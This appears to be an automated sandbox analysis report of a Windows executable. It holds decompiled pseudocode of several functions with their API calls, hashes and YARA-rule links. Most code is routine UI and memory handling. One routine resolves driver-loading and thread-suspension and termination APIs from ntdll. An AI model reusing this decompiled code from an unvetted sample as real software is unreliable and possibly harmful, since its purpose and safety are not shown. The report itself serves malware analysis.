				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                                            0x004068ec
                                                                                                                            0x004068f0
                                                                                                                            0x004068f4
                                                                                                                            0x004068ff
                                                                                                                            0x00406902
                                                                                                                            0x0040690a
                                                                                                                            0x00406910
                                                                                                                            0x00406911
                                                                                                                            0x0040691b
                                                                                                                            0x0040691e
                                                                                                                            0x00406923
                                                                                                                            0x0040692d
                                                                                                                            0x0040692e
                                                                                                                            0x00406933
                                                                                                                            0x0040693d
                                                                                                                            0x00406940
                                                                                                                            0x00406949
                                                                                                                            0x0040694a
                                                                                                                            0x00406950
                                                                                                                            0x00406956
                                                                                                                            0x00406959
                                                                                                                            0x0040695c
                                                                                                                            0x00406964
                                                                                                                            0x0040696d
                                                                                                                            0x00406974
                                                                                                                            0x0040697e
                                                                                                                            0x00406989
                                                                                                                            0x00406990
                                                                                                                            0x00406998
                                                                                                                            0x0040699b
                                                                                                                            0x0040699f
                                                                                                                            0x004069b8
                                                                                                                            0x004069bc
                                                                                                                            0x004069c4
                                                                                                                            0x004069c7
                                                                                                                            0x004069c7
                                                                                                                            0x004069cb
                                                                                                                            0x004069ce
                                                                                                                            0x004069d4
                                                                                                                            0x004069d4
                                                                                                                            0x004069d9
                                                                                                                            0x004069df
                                                                                                                            0x004069e6
                                                                                                                            0x004069ea
                                                                                                                            0x004069ef
                                                                                                                            0x004069f2
                                                                                                                            0x004069f5
                                                                                                                            0x00406a00
                                                                                                                            0x00406a01
                                                                                                                            0x00406a06
                                                                                                                            0x00406a08
                                                                                                                            0x00406a0b
                                                                                                                            0x00406a10
                                                                                                                            0x00406a16
                                                                                                                            0x00406a25
                                                                                                                            0x00406a25
                                                                                                                            0x00406a18
                                                                                                                            0x00406a1e
                                                                                                                            0x00406a1e
                                                                                                                            0x00406a27
                                                                                                                            0x00406a2f
                                                                                                                            0x00406a32
                                                                                                                            0x00406a35
                                                                                                                            0x00406a3b
                                                                                                                            0x00406a41
                                                                                                                            0x00406a47
                                                                                                                            0x00406a4d
                                                                                                                            0x00406a53
                                                                                                                            0x00406a5d
                                                                                                                            0x00406a6d

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                            • memcpy.MSVCRT ref: 0040696D
                                                                                                                            • memcpy.MSVCRT ref: 0040697E
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                              • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                              • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                              • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                              • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                              • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                              • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 975042529-0
                                                                                                                            • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                            • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                            • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                            • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                            0x004097b1
                                                                                                                            0x004097b9
                                                                                                                            0x004097bb
                                                                                                                            0x004097be
                                                                                                                            0x004097c3
                                                                                                                            0x004097ca
                                                                                                                            0x004097de
                                                                                                                            0x004097de
                                                                                                                            0x004097e3
                                                                                                                            0x004097e5
                                                                                                                            0x004097e5
                                                                                                                            0x004097ec
                                                                                                                            0x004097f3
                                                                                                                            0x004097f6
                                                                                                                            0x004097fe
                                                                                                                            0x00409802
                                                                                                                            0x00409805
                                                                                                                            0x0040980a
                                                                                                                            0x0040980d
                                                                                                                            0x00409810
                                                                                                                            0x00409822
                                                                                                                            0x00000000
                                                                                                                            0x00409827
                                                                                                                            0x0040982a
                                                                                                                            0x004098da
                                                                                                                            0x004098da
                                                                                                                            0x004098dc
                                                                                                                            0x004098e0
                                                                                                                            0x004098e9
                                                                                                                            0x004098ec
                                                                                                                            0x004098f6
                                                                                                                            0x004098f6
                                                                                                                            0x004098e2
                                                                                                                            0x00000000
                                                                                                                            0x004098e2
                                                                                                                            0x00409830
                                                                                                                            0x00409833
                                                                                                                            0x00409838
                                                                                                                            0x0040983b
                                                                                                                            0x0040983e
                                                                                                                            0x0040985f
                                                                                                                            0x0040985f
                                                                                                                            0x00409861
                                                                                                                            0x00409863
                                                                                                                            0x0040989e
                                                                                                                            0x004098b1
                                                                                                                            0x004098b8
                                                                                                                            0x004098c0
                                                                                                                            0x004098c5
                                                                                                                            0x004098d5
                                                                                                                            0x00409865
                                                                                                                            0x00409865
                                                                                                                            0x00409865
                                                                                                                            0x0040986c
                                                                                                                            0x00409878
                                                                                                                            0x0040987f
                                                                                                                            0x0040988a
                                                                                                                            0x0040988f
                                                                                                                            0x0040988f
                                                                                                                            0x0040986c
                                                                                                                            0x00000000
                                                                                                                            0x00409863
                                                                                                                            0x00409840
                                                                                                                            0x00409843
                                                                                                                            0x00409846
                                                                                                                            0x0040984b
                                                                                                                            0x00409852
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00409854
                                                                                                                            0x0040985d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040985d
                                                                                                                            0x00409894
                                                                                                                            0x00000000
                                                                                                                            0x00409894

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                              • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                            • memset.MSVCRT ref: 00409805
                                                                                                                            • memcpy.MSVCRT ref: 0040988A
                                                                                                                            • memcpy.MSVCRT ref: 004098C0
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3641025914-0
                                                                                                                            • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                            • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                            • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                            • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                            0x004067ac
                                                                                                                            0x004067af
                                                                                                                            0x004067b5
                                                                                                                            0x004067ba
                                                                                                                            0x004067bf
                                                                                                                            0x004067c1
                                                                                                                            0x004067c6
                                                                                                                            0x004067c7
                                                                                                                            0x004067cc
                                                                                                                            0x004067cd
                                                                                                                            0x004067d2
                                                                                                                            0x004067d4
                                                                                                                            0x004067d9
                                                                                                                            0x004067da
                                                                                                                            0x004067df
                                                                                                                            0x004067e0
                                                                                                                            0x004067e5
                                                                                                                            0x004067e7
                                                                                                                            0x004067ec
                                                                                                                            0x004067ed
                                                                                                                            0x004067f2
                                                                                                                            0x004067f3
                                                                                                                            0x004067f8
                                                                                                                            0x004067fa
                                                                                                                            0x004067ff
                                                                                                                            0x00406800
                                                                                                                            0x00406805
                                                                                                                            0x00406806
                                                                                                                            0x00406808
                                                                                                                            0x0040680f
                                                                                                                            0x00406810
                                                                                                                            0x00406812
                                                                                                                            0x00406817
                                                                                                                            0x0040681e
                                                                                                                            0x00406828
                                                                                                                            0x0040682b
                                                                                                                            0x0040682c
                                                                                                                            0x0040681e
                                                                                                                            0x00406835
                                                                                                                            0x00406839
                                                                                                                            0x00406841

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                              • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                            • free.MSVCRT(00000000), ref: 00406839
                                                                                                                              • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??3@$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2241099983-0
                                                                                                                            • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                            • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                            • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                            • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                            0x00405d03
                                                                                                                            0x00405d06
                                                                                                                            0x00405d10
                                                                                                                            0x00405d17
                                                                                                                            0x00405d22
                                                                                                                            0x00405d32
                                                                                                                            0x00405d40
                                                                                                                            0x00405d48
                                                                                                                            0x00405d4e
                                                                                                                            0x00405d54
                                                                                                                            0x00405d59
                                                                                                                            0x00405d5c
                                                                                                                            0x00405d61
                                                                                                                            0x00405d67

                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 00405D0A
                                                                                                                            • GetWindowRect.USER32 ref: 00405D17
                                                                                                                            • GetClientRect.USER32 ref: 00405D22
                                                                                                                            • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4247780290-0
                                                                                                                            • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                            • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                            • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                            • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                            0x004083dc
                                                                                                                            0x004083e2
                                                                                                                            0x004083e9
                                                                                                                            0x004083ea
                                                                                                                            0x004083eb
                                                                                                                            0x004083f3
                                                                                                                            0x004083f6
                                                                                                                            0x004083f8
                                                                                                                            0x00408401
                                                                                                                            0x00408404
                                                                                                                            0x00408407
                                                                                                                            0x00408409
                                                                                                                            0x0040840c
                                                                                                                            0x00408413
                                                                                                                            0x0040841d
                                                                                                                            0x00408427
                                                                                                                            0x0040842c
                                                                                                                            0x0040842f
                                                                                                                            0x00408432
                                                                                                                            0x00408435
                                                                                                                            0x00408438
                                                                                                                            0x00408439
                                                                                                                            0x0040843e
                                                                                                                            0x0040843f
                                                                                                                            0x00408442
                                                                                                                            0x0040844a

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$??2@??3@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1252195045-0
                                                                                                                            • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                            • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                            • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                            • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 76%
                                                                                                                            			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                            0x00406746
                                                                                                                            0x00406746
                                                                                                                            0x0040674f
                                                                                                                            0x00406751
                                                                                                                            0x00406752
                                                                                                                            0x00406757
                                                                                                                            0x00406758
                                                                                                                            0x0040675d
                                                                                                                            0x0040675f
                                                                                                                            0x00406760
                                                                                                                            0x00406765
                                                                                                                            0x00406766
                                                                                                                            0x0040676e
                                                                                                                            0x00406770
                                                                                                                            0x00406771
                                                                                                                            0x00406776
                                                                                                                            0x00406777
                                                                                                                            0x0040677f
                                                                                                                            0x00406781
                                                                                                                            0x00406785
                                                                                                                            0x00406787
                                                                                                                            0x00406788
                                                                                                                            0x0040678e
                                                                                                                            0x0040678e
                                                                                                                            0x00406790
                                                                                                                            0x00406791
                                                                                                                            0x00406796
                                                                                                                            0x00406798
                                                                                                                            0x0040679e
                                                                                                                            0x004067a1
                                                                                                                            0x004067a4
                                                                                                                            0x004067ab

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??3@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 613200358-0
                                                                                                                            • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                            • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                            • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                            • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                            0x0040aba8
                                                                                                                            0x0040aba9
                                                                                                                            0x0040abb0
                                                                                                                            0x0040abb2
                                                                                                                            0x0040abb5
                                                                                                                            0x0040ac19
                                                                                                                            0x0040ac2c
                                                                                                                            0x0040ac2e
                                                                                                                            0x0040ac36
                                                                                                                            0x0040ac39
                                                                                                                            0x0040ac39
                                                                                                                            0x0040ac1b
                                                                                                                            0x0040ac21
                                                                                                                            0x0040ac21
                                                                                                                            0x0040abb7
                                                                                                                            0x0040abcb
                                                                                                                            0x0040abce
                                                                                                                            0x0040abd7
                                                                                                                            0x0040abe6
                                                                                                                            0x0040abf6
                                                                                                                            0x0040abfe
